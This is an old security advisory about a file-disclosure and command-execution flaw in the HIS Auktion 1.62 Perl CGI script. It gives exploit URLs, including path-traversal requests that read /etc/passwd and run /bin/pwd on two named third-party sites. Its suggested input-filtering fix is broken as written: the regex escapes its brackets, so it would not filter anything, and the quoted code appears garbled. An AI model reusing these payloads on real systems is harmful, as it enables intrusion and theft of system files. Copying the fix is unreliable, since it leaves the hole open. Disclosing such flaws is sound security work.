-----------UkR security team advisory #8------------ HIS Auktion 1.62: "show files" vulnerability and remote command execute. -------------------------------------------------- Name: HIS Auktion 1.62: "show files" vulnurability. Date: 11.02.2001 Author: UkR-XblP About: script "HIS Auktion 1.62" is a catalog of links CGI script. The creators site http://www.his-software.de Problem: -------from auktion.pl------- sub readfile { local($filename)=$_0; local(@array); open(f,$filename); ---------------------------- $filename - is not filterred on symbols. Exploit: http://www.victim.com/cgi-bin/auktion.pl?menue=path/to/any/file/or/command FIX: to fix the bug yo need to add variable $filename check to the script. For example: $filename=~s/(\[\]\;\:\/\$\!\$\&\`\\\(\)\{\}\")/\\$1/g; Example: http://www.zimmerauktion.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../bin/pwd | http://www.chess-international.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd Get your free e-mail address at http://www.zmail.ru